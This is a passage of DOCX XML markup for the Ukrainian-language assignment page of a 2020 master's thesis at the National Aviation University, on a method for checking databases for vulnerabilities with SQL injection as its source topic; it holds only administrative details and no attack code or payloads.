    <w:p w14:paraId="1467D8C5" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14ED2F68" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C636E8" w14:textId="04F63576" w:rsidR="009A35B5" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Київ 2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F27F6" w14:textId="77777777" w:rsidR="007D796A" w:rsidRDefault="007D796A" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746D95DA" w14:textId="250F1B83" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>НАЦІОНАЛЬНИЙ АВІАЦІЙНИЙ УНІВЕРСИТЕТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3746E95C" w14:textId="7E8D27BD" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Факультет:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кібербезпеки, комп’ютерної та програмної інженерії</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8FF12" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Кафедра: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Комп’ютеризованих систем захисту інформації</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BF7BB6" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Освітній ступінь: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Магістр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851B528" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Спеціальність: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>125 «Кібербезпека»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A697C" w14:textId="46CB67AF" w:rsidR="008E5C9C" w:rsidRPr="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Освітньо-професійна програма: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">«Безпека інформаційних і комунікаційних систем» </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD9F08" w14:textId="1C279BC1" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ЗАТВЕРДЖУЮ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368EF3E9" w14:textId="7AC061CD" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завідувач кафедри</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F82EC20" w14:textId="05B1779A" w:rsidR="005027FB" w:rsidRDefault="008E5C9C" w:rsidP="005027FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="7797"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>С.В. Казмірчук</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174E7D0" w14:textId="5CA98B7F" w:rsidR="008E5C9C" w:rsidRPr="00A92302" w:rsidRDefault="008E5C9C" w:rsidP="00E06BBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="8080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AE069D" w14:textId="741AB729" w:rsidR="00E06BBF" w:rsidRDefault="00E06BBF" w:rsidP="00E06BBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="8080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>«___»__________20___ р.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF19CA7" w14:textId="331376C7" w:rsidR="00E06BBF" w:rsidRDefault="00E06BBF" w:rsidP="00E06BBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="8080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC08E68" w14:textId="05DBE963" w:rsidR="00E06BBF" w:rsidRPr="00E06BBF" w:rsidRDefault="00E06BBF" w:rsidP="00E06BBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="8080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ЗАВДАННЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60953123" w14:textId="02494A8B" w:rsidR="00E06BBF" w:rsidRPr="00E06BBF" w:rsidRDefault="00E06BBF" w:rsidP="00E06BBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="8080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на виконання магістерської атестаційної роботи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD6B2C" w14:textId="30C467B3" w:rsidR="00E06BBF" w:rsidRDefault="00E06BBF" w:rsidP="00E06BBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="8080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>магістранта Михайловського Володимира Федоровича</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040EBD1C" w14:textId="44798881" w:rsidR="00E06BBF" w:rsidRDefault="00E06BBF" w:rsidP="00E06BBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="8080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05769296" w14:textId="6DCE29B0" w:rsidR="00E06BBF" w:rsidRPr="00A56DDF" w:rsidRDefault="00E06BBF" w:rsidP="00A56DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06BBF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Тема: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E06BBF">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Метод перевірки баз даних на вразливості</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>затверджена наказом рект</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ра від </w:t>
      </w:r>
      <w:r w:rsidR="00A56DDF" w:rsidRPr="00A56DDF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>«02</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56DDF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidR="00A56DDF" w:rsidRPr="00A56DDF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>жовтня</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56DDF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidR="00A56DDF" w:rsidRPr="00A56DDF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56DDF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A56DDF" w:rsidRPr="00A56DDF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>№ 2265/ст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F617A" w14:textId="01071D95" w:rsidR="00A56DDF" w:rsidRDefault="00A56DDF" w:rsidP="00A56DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Термін виконання з 14.10.2019 р. по 09.02.2020 р.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09067BDA" w14:textId="36314E4A" w:rsidR="00A56DDF" w:rsidRPr="00A56DDF" w:rsidRDefault="00A56DDF" w:rsidP="00A56DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Вихідні дані роботи: дані про  м</w:t>
      </w:r>
      <w:r w:rsidR="002908D0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>етоди</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> проведення SQL-ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708861A5" w14:textId="6333A834" w:rsidR="00A56DDF" w:rsidRPr="00A56DDF" w:rsidRDefault="00A56DDF" w:rsidP="00A56DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зміст пояснювальної записки</w:t>
      </w:r>
      <w:r w:rsidRPr="005018F4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">: нормативно-правові стандарти в галузі захисту баз даних, SQL-ін’єкції, етапи роботи </w:t>
      </w:r>
      <w:r w:rsidR="005018F4" w:rsidRPr="005018F4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>розробленого інструменту</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3301E169" w14:textId="29D0EAB0" w:rsidR="002908D0" w:rsidRPr="00EE2160" w:rsidRDefault="00A56DDF" w:rsidP="00FF6E1E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Перелік </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>обов'язкового ілюстративного матеріалу</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>: рисунки, схеми, презент</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ція </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Power</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA42BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2160">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, таблиці.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB13194" w14:textId="4BC80442" w:rsidR="002908D0" w:rsidRDefault="002908D0" w:rsidP="002908D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53583DCE" w14:textId="7B47DBE7" w:rsidR="002908D0" w:rsidRDefault="002908D0" w:rsidP="002908D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECC257B" w14:textId="48C69D33" w:rsidR="002908D0" w:rsidRDefault="002908D0" w:rsidP="002908D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06898C3E" w14:textId="65D5CA6A" w:rsidR="002908D0" w:rsidRDefault="002908D0" w:rsidP="002908D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C31E92" w14:textId="3978AD9E" w:rsidR="002908D0" w:rsidRDefault="002908D0" w:rsidP="002908D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688E5578" w14:textId="51DF21A0" w:rsidR="002908D0" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
